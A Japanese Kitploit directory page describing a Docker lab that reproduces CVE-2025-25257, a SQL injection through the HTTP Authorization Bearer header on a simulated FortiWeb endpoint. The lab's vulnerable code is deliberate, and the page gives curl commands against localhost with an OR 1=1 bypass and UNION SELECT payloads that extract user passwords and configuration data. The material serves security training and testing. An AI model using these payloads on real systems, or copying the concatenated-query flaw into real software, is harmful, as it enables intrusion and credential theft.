Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
cve-2025-25257 — CVE-2025-25257 の再現可能なDockerラボ。シミュレートされたFortiWebエンドポイント上でHTTP Authorizationヘッダーを介したSQLインジェクションのバイパスとデータ流出を実証します。 | Kitploit
ツール/GitHubGitHub/lytianahkone-boop/cve-2025-25257
脆弱性分析エクスプロイトウェブアプリケーション悪用学習と教育データベースセキュリティラボと実践
GitHublytianahkone-boop/cve-2025-25257

cve-2025-25257

CVE-2025-25257 の再現可能なDockerラボ。シミュレートされたFortiWebエンドポイント上でHTTP Authorizationヘッダーを介したSQLインジェクションのバイパスとデータ流出を実証します。

リポジトリを見る
28ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-25257 - 実験環境

実験アーキテクチャ (環境はFortiWebの脆弱なコンポーネントをシミュレートします)

root@kitploit:~
脆弱なエンドポイント : /api/system/fabric/config
インジェクションベクター : HTTP Authorization: Bearer ヘッダー
メカニズム : 直接SQL連結 (Pythonのf-string)
認証 : なし (完全バイパス)
データベース : SQLite (デモ用)

cve-2025-25257

├── Dockerfile
├── docker-compose.yml
├── requirements.txt
├── app.py
├── init_db.py
├── payload.txt
└── README.md

Dockerfile : 意図的に脆弱なHTTPサービス / 認証なしで悪用可能なAPIを公開

docker-compose.yml : 再現可能な脆弱なサービスをオーケストレーション / HTTP経由で攻撃可能なAPIを公開 / 実験環境を隔離

requirements.txt : 安定して再現可能な環境を保証

app.py : 事前認証エンドポイントを実装 / Authorizationを介してユーザー入力を受け入れる / その入力をSQLクエリに連結 / 認証バイパスとデータ抽出を可能にする

init_db.py : 悪用可能なデータセットを準備 / 認証バイパスとデータの外部流出の明確なデモを可能にする

payload.txt : 制御された観測可能なコード実行の最小限の証明を提供

ステップ1: コンテナをビルドして起動

Dockerイメージの構築

docker-compose build

コンテナの起動

docker-compose up -d

コンテナが動作していることを確認

docker-compose ps

ログを確認

docker-compose logs -f

ステップ2: サービスのアクセス可能性を確認

curl http://localhost:8080/api/system/status

ステップ3: 脆弱性の悪用

無害なリクエスト

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer valid_token_001"

SQLインジェクション攻撃リクエスト: OR 1=1 によるバイパス

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' OR '1'='1"

UNION-SELECTインジェクションによるデータ抽出

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, username, password, role, email, NULL FROM users--"

機密データの外部流出

curl -X POST http://localhost:8080/api/system/fabric/config
-H "Content-Type: application/json"
-H "Authorization: Bearer ' UNION SELECT id, key, value, description, '2025-01-01',NULL FROM system_config--"

ステップ4: クリーンアップと停止

コンテナを停止

docker-compose down

ボリュームを削除

docker-compose down -v

イメージを削除

docker rmi cve-2025-25257-lab-fortiweb-vulnerable:latest

ツールをダウンロード